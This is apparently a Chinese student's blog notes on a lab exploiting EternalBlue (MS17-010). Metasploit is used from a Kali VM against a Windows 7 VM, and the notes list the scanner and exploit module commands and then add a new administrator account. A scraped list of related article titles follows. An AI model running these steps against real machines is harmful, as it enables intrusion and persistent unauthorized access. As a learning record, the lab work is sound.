小白学了一点简单的永恒之蓝,做了点笔记,感觉挺详细,希望能帮助到小伙伴们,大佬勿喷哦,有不足的地方希望多多指教

实验目的
本次实验主要是利用永恒之蓝漏洞对windows7进行控制利用,掌握Metaploit工具的使用,知道永恒之蓝的漏洞利用原理。

实验原理
永恒之蓝是在Windows的SMB服务处理SMB v1 请求时发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码。通过永恒之蓝漏洞会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

实验内容
1、实验环境(这是我自己电脑上的实验环境)
Kalilinux —攻击机 IP:192.168.153.131
Win7系统 —靶机 IP: 192.168.153.133
本实验永恒之蓝漏洞是基于445端口

2、实验工具
Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。

3、关闭防火墙和杀毒软件的前提下进行实验,靶机的445端口还要开启(这里我只是做了这一种情况,另外一种情况开启防火墙且关闭杀毒软件的前提下还没摸索出来,希望大佬可以提下意见)

(1)kali linux:zenmap端口扫描

如下图所示:可以发现445端口是开启的
(2)再看系统的ip:
(3)再看win7系统查看端口开放情况

(4)使用渗透工具:metasploit framework
使用scanner 扫描靶机是否存在永恒之蓝漏洞
Search ms17_010
如下图所示:
Use auxiliary/scanner/smb/smb_ms17_010
Show options --查看扫描结果
Set rhost 192.168.153.133 —执行目标主机
(5)进入渗透模块,设置靶机地址
Search ms17_01
Use exploit/windows/smb/ms17_010_eternalblue —进入渗透模块
Set rhosts 192.168.153.133 —设置渗透的目标主机
Run —执行渗透的攻击
此时,渗透成功了

(6)在kali Linux 上查看win7 的端口开放情况和arp缓存表
验证:创建一个qq用户 看是否成功
提升创建的qq 用户权限为管理员
Net localgroup administors qq
重启win7 之后,会有刚才创建的用户 qq:
可见,kali虚拟机可以利用永恒之蓝漏洞对windows7进行控制利用了。

以上是我做的一个小小实验,有很多不足的地方,希望大佬多多指点。

永恒之蓝漏洞(开放445端口,关闭防火墙)相关推荐

  1. EternalBlue永恒之蓝漏洞(MS17-010)复现

    测试环境 靶机:    Windows7                IP:192.168.5.90   开放445端口  关闭防火墙 攻击机:Windows10/kali        IP:19 ...

  2. 蠕虫病毒利用永恒之蓝漏洞传播 单位局域网受威胁最大

    一. 概述 日前,火绒安全团队通过"火绒威胁情报系统"发现蠕虫病毒"Worm/Sharp"正在全网传播,其中在政府.企业.学校.医院等单位的局域网具有非常强的传 ...

  3. 【重要预警】“永恒之蓝”漏洞又现新木马 组成僵尸网络挖矿虚拟货币

    WannaCry和UIWIX勒索软件在全世界掀起了轩然大波,但是利用"永恒之蓝"漏洞进行攻击的却不止这两个恶意软件.今日,亚信安全中国病毒响应中心发现了利用"永恒之蓝&q ...

  4. MS17-010永恒之蓝漏洞的简谈与利用

    MS17-010是一个安全类型的补丁. MS17-010更新修复了 Microsoft Windows中的漏洞. 如果攻击者向 Microsoft 服务器消息块 1.0 (SMBv1) 服务器发送经特 ...

  5. MS17-010(永恒之蓝)漏洞复现和分析

    MS17-010(永恒之蓝)漏洞复现和分析 一.漏洞简介 1.永恒之蓝介绍: 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含&q ...

  6. 永恒之蓝漏洞复现-CVE-2017-0144

    1.原理 永恒之蓝是在Windows的SMB服务处理SMB v1请求时发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码.通过永恒之蓝漏洞会扫描开放445文件共享端口的Windows机器,无需 ...

  7. kali 利用msf通过win7永恒之蓝漏洞获取权限

    kali 利用msf通过win7永恒之蓝漏洞获取权限 老师留的信息安全课大作业:要通过漏洞来实现原本权限做不到的事 本菜狗就选了永恒之蓝漏洞来应付下,也是第一次搞这种网安类型的实验,下面正文的描述中应 ...

  8. MS17-010永恒之蓝漏洞利用,win32安装,windows 7 32位

    漏洞复现:MS17-010 漏洞利用的条件:1.靶机开启445端口(如果未打开该端口将会攻击失败,百度打开445端口) 2.关闭防火墙 靶机:windows 7(未知X32位还是X64位) ip:19 ...

  9. 《MS17-010(永恒之蓝)—漏洞复现及防范》

    作者: susususuao 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责. 一. 什么是永恒之蓝? - 永恒之蓝 永恒之蓝(Eternal Blue)是一种利用Window ...

最新文章

  1. mybatis可以用oracle,使用MyBatis调用oracle函数(基于注释)
  2. star ccm+ 用户指南_star-ccm边界层处理方法
  3. WWF(Windows Workflow Foundation)开发环境的建立。 .NET 技术前瞻,WWF,Windows,Workflow,Foundation...
  4. C#程序以管理员权限运行
  5. 单线程任务 Task.Factory.StartNew 封装
  6. C#利用WebClient 两种方式下载文件(一)
  7. [Windowns C]递归遍历指定目录下的子目录和文件
  8. [转] css3变形属性transform
  9. ziplist之详细分析
  10. 测绘工程野外测量实践实习
  11. 打印菱形 java_怎么用java打印菱形?
  12. kernel支持4k/16k/64k pagesize
  13. ubuntu加了张固态_将ubuntu系统迁移到ssd固态
  14. flink 分词程序代码(批处理和实时)
  15. 拼音检索VS五笔检索---Javascript实现
  16. 兆骑科创创新创业大赛活动举办,线上直播路演,投融资对接
  17. 现实版《黑镜》上演!这位程序媛用 AI 让已故基友“永生”
  18. “珠三角”企业创新难在哪里
  19. 人力资源管理系统 | 人事管理系统--毕业设计03
  20. 蓝桥杯第十届c语言试题答案,蓝桥杯试题答案(C语言)蓝桥杯试题答案(C语言).pdf...

热门文章

  1. BTO来了,你要知道些什么?
  2. 小学计算机第三册,小学信息技术第三册教案.doc
  3. 一台小型发电机与计算机相连,2020春青岛市高考物理二轮45分钟练习:交变电流的产生及描述含答案...
  4. 井径测井原理、计算方法、主要应用、仪器刻度、质量控制
  5. vue+element-UI实现右键菜单
  6. 中兴u880照相机声音怎么关啊
  7. 微软2012年7月最有价值专家(MVP)名单 51CTO二十二位用户当选
  8. vue3 setup中props和emit用法
  9. liblbfgs中L-BFGS算法的实现
  10. 用Android-X86和VMware打造高性能Android开发环境